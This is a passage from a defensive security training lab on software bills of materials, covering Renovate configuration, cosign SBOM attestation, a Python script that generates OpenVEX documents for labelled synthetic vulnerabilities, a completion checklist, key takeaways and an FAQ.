"groupName": "dev dependencies",
"automerge": true
},
{
"description": "Block major updates — require manual review",
"matchUpdateTypes": ["major"],
"automerge": false,
"labels": ["major-update", "manual-review"]
},
{
"description": "Security updates — immediate, bypass normal schedule",
"matchCategories": ["security"],
"schedule": ["at any time"],
"automerge": true,
"prPriority": 10
}
],
"customManagers": [
{
"customType": "regex",
"fileMatch": ["Dockerfile$"],
"matchStrings": [
"FROM\\s+(?<depName>[^:]+):(?<currentValue>[^\\s@]+)(?:@(?<currentDigest>sha256:[a-f0-9]+))?"
],
"datasourceTemplate": "docker"
}
]
}
RENOVATE
6.5 — SBOM Attestation with Sigstore cosign¶
Why Attestation Matters
SBOM attestation cryptographically binds an SBOM to the build that produced it. Without attestation, an SBOM is just a JSON file — anyone could have created it. With Sigstore cosign, you get:
- Keyless signing — no key management overhead (uses OIDC identity)
- Transparency log — all attestations are recorded in Rekor for auditability
- Tamper detection — any modification to the SBOM invalidates the signature
- Supply chain provenance — proves WHO built WHAT, WHEN, and FROM which source
# ── Sign an SBOM with cosign (keyless, using Sigstore) ──
cosign attest-blob \
--predicate sboms/web-portal-syft-cdx.json \
--type cyclonedx \
--bundle attestations/web-portal-attestation.json \
--yes
# ── Verify the attestation ──
cosign verify-blob-attestation \
--bundle attestations/web-portal-attestation.json \
--certificate-identity "testuser@internal.example.com" \
--certificate-oidc-issuer "https://auth.internal.example.com" \
--type cyclonedx \
sboms/web-portal-syft-cdx.json
Expected output:
6.6 — VEX Document Creation¶
VEX (Vulnerability Exploitability eXchange) documents communicate the actual exploitability status of vulnerabilities in the context of a specific product.
cat > ~/lab31-sbom/scripts/generate_vex.py << 'VEX_GEN'
#!/usr/bin/env python3
"""
VEX Document Generator — Creates Vulnerability Exploitability eXchange documents
in OpenVEX format to communicate vulnerability status to consumers.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from datetime import datetime, timezone
def generate_vex_document(app_name: str, vulns: list[dict]) -> dict:
"""Generate an OpenVEX document for a set of vulnerabilities."""
vex = {
"@context": "https://openvex.dev/ns/v0.2.0",
"@id": f"https://sbom-server.internal.example.com/vex/{app_name}/2026-04-12",
"author": "Meridian Security Engineering <security@internal.example.com>",
"role": "Document Creator",
"timestamp": "2026-04-12T10:00:00Z",
"version": 1,
"tooling": "Lab 31 VEX Generator v1.0",
"statements": [],
}
# ── Define VEX status for each vulnerability ──
vex_assessments = {
"CVE-SYNTH-2026-1001": {
"status": "affected",
"justification": None,
"action_statement": "Update axios to version 1.6.1 or later. The SSRF vulnerability is exploitable in our configuration because the web portal makes proxy-configured HTTP requests based on user input.",
"impact_statement": "An attacker could redirect internal HTTP requests to access services on 10.50.0.0/16 network."
},
"CVE-SYNTH-2026-1002": {
"status": "affected",
"justification": None,
"action_statement": "URGENT: Update jsonwebtoken to 9.0.1 immediately. Our authentication middleware does not explicitly set the 'algorithms' option, making it vulnerable to algorithm confusion. This is listed in CISA KEV.",
"impact_statement": "Authentication bypass allows unauthenticated access to all API endpoints."
},
"CVE-SYNTH-2026-1003": {
"status": "not_affected",
"justification": "vulnerable_code_not_in_execute_path",
"action_statement": "No action required. Our code does not use lodash merge/mergeWith/defaultsDeep functions. Verified by static analysis scan on 2026-04-10.",
"impact_statement": None,
},
"CVE-SYNTH-2026-1004": {
"status": "not_affected",
"justification": "vulnerable_code_cannot_be_controlled_by_adversary",
"action_statement": "No immediate action required. Moment locale loading is hardcoded to 'en-US' and does not accept user input. Schedule update to 2.30.1 in next maintenance window.",
"impact_statement": None,
},
"CVE-SYNTH-2026-1005": {
"status": "affected",
"justification": None,
"action_statement": "Update semver to 7.5.5. While ReDoS requires crafted input, the version range parser processes user-supplied version constraints in the plugin system.",
"impact_statement": "Denial of service via crafted version range strings in plugin manifest."
},
"CVE-SYNTH-2026-1006": {
"status": "under_investigation",
"justification": None,
"action_statement": "Security team is analyzing whether the open redirect in express is reachable through our route configuration. Expected completion: 2026-04-15.",
"impact_statement": None,
},
"CVE-SYNTH-2026-2001": {
"status": "affected",
"justification": None,
"action_statement": "CRITICAL: Update cryptography to 41.0.7 immediately. The data pipeline uses RSA OAEP for encrypting data at rest. This vulnerability is in CISA KEV with active exploitation.",
"impact_statement": "Remote code execution via crafted ciphertext in data ingestion pipeline."
},
"CVE-SYNTH-2026-2002": {
"status": "affected",
"justification": None,
"action_statement": "Update Pillow to 10.2.0. The data pipeline processes user-uploaded TIFF images in the document processing module.",
"impact_statement": "Remote code execution via crafted TIFF image upload."
},
"CVE-SYNTH-2026-2003": {
"status": "not_affected",
"justification": "vulnerable_code_not_in_execute_path",
"action_statement": "No action required. Jinja2 is used only for internal report generation with hardcoded templates. User input is never passed to the template engine.",
"impact_statement": None,
},
"CVE-SYNTH-2026-2004": {
"status": "affected",
"justification": None,
"action_statement": "Update paramiko to 3.4.0. The data pipeline uses SFTP for file transfer with external partners. Host key validation configuration needs review.",
"impact_statement": "Man-in-the-middle attack on SFTP file transfers with partner systems."
},
"CVE-SYNTH-2026-3001": {
"status": "not_affected",
"justification": "vulnerable_code_cannot_be_controlled_by_adversary",
"action_statement": "No immediate action required. Our Log4j2 pattern layouts do not include ThreadContext map data. Schedule update to 2.23.0 in next quarterly patch cycle.",
"impact_statement": None,
},
"CVE-SYNTH-2026-3002": {
"status": "affected",
"justification": None,
"action_statement": "Update jackson-databind to 2.16.1. The API gateway deserializes JSON payloads from external clients. While default typing is not globally enabled, review custom ObjectMapper configurations.",
"impact_statement": "Potential remote code execution via crafted JSON payload."
},
}
for vuln_id, assessment in vex_assessments.items():
statement = {
"vulnerability": {
"@id": f"https://nvd-mirror.internal.example.com/vuln/{vuln_id}",
"name": vuln_id,
},
"products": [
{
"@id": f"pkg:generic/{app_name}",
}
],
"status": assessment["status"],
}
if assessment["justification"]:
statement["justification"] = assessment["justification"]
if assessment["action_statement"]:
statement["action_statement"] = assessment["action_statement"]
if assessment["impact_statement"]:
statement["impact_statement"] = assessment["impact_statement"]
vex["statements"].append(statement)
return vex
if __name__ == "__main__":
vex_doc = generate_vex_document("meridian-platform", [])
output_path = "reports/vex-document.json"
with open(output_path, "w") as f:
json.dump(vex_doc, f, indent=2)
print(f"VEX document generated: {output_path}")
print(f"Total statements: {len(vex_doc['statements'])}")
# Summary
status_counts = {}
for stmt in vex_doc["statements"]:
status = stmt["status"]
status_counts[status] = status_counts.get(status, 0) + 1
print(f"\nVEX Status Summary:")
for status, count in sorted(status_counts.items()):
print(f" {status:<25} {count}")
print(f"\nAffected vulnerabilities requiring action:")
for stmt in vex_doc["statements"]:
if stmt["status"] == "affected":
vuln_id = stmt["vulnerability"]["name"]
action = stmt.get("action_statement", "No action specified")
print(f" {vuln_id}: {action[:80]}...")
VEX_GEN
chmod +x ~/lab31-sbom/scripts/generate_vex.py
Run:
Expected output:
VEX document generated: reports/vex-document.json
Total statements: 12
VEX Status Summary:
affected 7
not_affected 4
under_investigation 1
Affected vulnerabilities requiring action:
CVE-SYNTH-2026-1001: Update axios to version 1.6.1 or later. The SSRF vulnerability is exploitab...
CVE-SYNTH-2026-1002: URGENT: Update jsonwebtoken to 9.0.1 immediately. Our authentication middl...
CVE-SYNTH-2026-1005: Update semver to 7.5.5. While ReDoS requires crafted input, the version ra...
CVE-SYNTH-2026-2001: CRITICAL: Update cryptography to 41.0.7 immediately. The data pipeline use...
CVE-SYNTH-2026-2002: Update Pillow to 10.2.0. The data pipeline processes user-uploaded TIFF ima...
CVE-SYNTH-2026-2004: Update paramiko to 3.4.0. The data pipeline uses SFTP for file transfer wi...
CVE-SYNTH-2026-3002: Update jackson-databind to 2.16.1. The API gateway deserializes JSON paylo...
Lab Review and Validation¶
Completion Checklist¶
Use this checklist to verify you have completed all lab phases:
| Phase | Task | Status |
|---|---|---|
| 1 | Generated SBOMs with Syft for all 3 apps (SPDX + CycloneDX) | ☐ |
| 1 | Generated SBOMs with Trivy for all 3 apps | ☐ |
| 1 | Generated SBOMs with cdxgen for all 3 apps | ☐ |
| 1 | Compared SPDX 2.3 vs CycloneDX 1.5 structure differences | ☐ |
| 1 | Verified component counts across tools | ☐ |
| 2 | Parsed SBOMs with sbom_parser.py | ☐ |
| 2 | Built dependency graph with dependency_tree.py | ☐ |
| 2 | Analyzed cross-application dependency overlap | ☐ |
| 2 | Calculated dependency depth and breadth metrics | ☐ |
| 3 | Scanned SBOMs with Grype for vulnerabilities | ☐ |
| 3 | Queried synthetic OSV database for vulnerability details | ☐ |
| 3 | Built risk priority matrix with CVSS + EPSS + KEV + business context | ☐ |
| 3 | Identified P0-EMERGENCY items requiring immediate action | ☐ |
| 4 | Ran typosquatting detector against all SBOMs | ☐ |
| 4 | Ran dependency confusion detector | ☐ |
| 4 | Analyzed package metadata for anomalies | ☐ |
| 5 | Extracted and classified all licenses from SBOMs | ☐ |
| 5 | Identified copyleft vs permissive license distribution | ☐ |
| 5 | Generated compliance matrix against enterprise policy | ☐ |
| 6 | Created GitHub Actions SBOM pipeline | ☐ |
| 6 | Configured Dependabot for automated updates | ☐ |
| 6 | Created Renovate configuration (alternative) | ☐ |
| 6 | Performed SBOM attestation with cosign | ☐ |
| 6 | Generated VEX document with exploitability assessments | ☐ |
Key Takeaways¶
What You Learned
- SBOM generation is tool-dependent — different tools produce different results. Always validate and document your tooling choices.
- Transitive dependencies are the real risk — direct dependencies are visible in manifests, but transitive dependencies hide deep in the supply chain.
- CVSS alone is insufficient — combining EPSS exploitation probability, CISA KEV status, and business context produces dramatically better prioritization.
- Supply chain attacks are multifaceted — typosquatting, dependency confusion, and maintainer compromise are all active threat vectors requiring distinct detection strategies.
- License compliance is a security concern — copyleft license violations can force source code disclosure, which is itself a security risk.
- Attestation closes the trust gap — without cryptographic attestation, SBOMs are unverifiable claims. Sigstore cosign provides keyless, auditable signing.
- Automation is non-negotiable — manual SBOM analysis does not scale. CI/CD integration ensures every build is analyzed.
Answers to Common Questions¶
FAQ
Q: Which SBOM format should I use — SPDX or CycloneDX? A: Use CycloneDX for security-focused workflows (vulnerability tracking, VEX) and SPDX for license compliance. Many organizations generate both. Government contracts may require SPDX for ISO/IEC 5962 compliance.
Q: How often should SBOMs be regenerated? A: Generate a new SBOM for every build/release. Additionally, run weekly rescans against updated vulnerability databases (new CVEs are published daily).
Q: What is the difference between VEX and a vulnerability report? A: A vulnerability report lists all known vulnerabilities. A VEX document adds context — is this vulnerability actually exploitable in YOUR product? VEX statements reduce false positives by marking vulnerabilities as "not_affected" with justification.
Q: Should I include devDependencies in SBOMs? A: Yes, if they are present in the build environment. Compromised devDependencies (like eslint-scope in 2018) can execute malicious code during the build process, even if they are not shipped in production.
Challenge Extensions¶
Bonus Challenges
- SBOM Diff: Write a script that compares two SBOMs of the same application (e.g., v3.8.1 vs v3.8.2) and reports added, removed, and updated components.
- Reachability Analysis: Integrate with a call graph analysis tool to determine if vulnerable code paths are actually reachable from application entry points.
- SBOM Enrichment: Write a script that enriches CycloneDX SBOMs with OpenSSF Scorecard data for each component.
- Custom Policy Engine: Build a policy engine that evaluates SBOMs against custom rules (e.g., "no packages with fewer than 1000 weekly downloads", "no packages published in the last 7 days").
- SBOM-to-Graph: Export SBOM dependency data to a Neo4j graph database and write Cypher queries for supply chain risk analysis.
Cross-References¶
- Chapter 24 — Supply Chain Attacks — Attack techniques and defense strategies for software supply chain security
- Chapter 54 — SBOM Operations — Enterprise SBOM lifecycle management, tooling comparisons, and maturity model
- Chapter 55 — Threat Modeling Operations — Threat modeling for supply chain risks, including STRIDE analysis of package registries
Lab 31 of the Nexus SecOps Lab Series. All data is synthetic. For educational use only.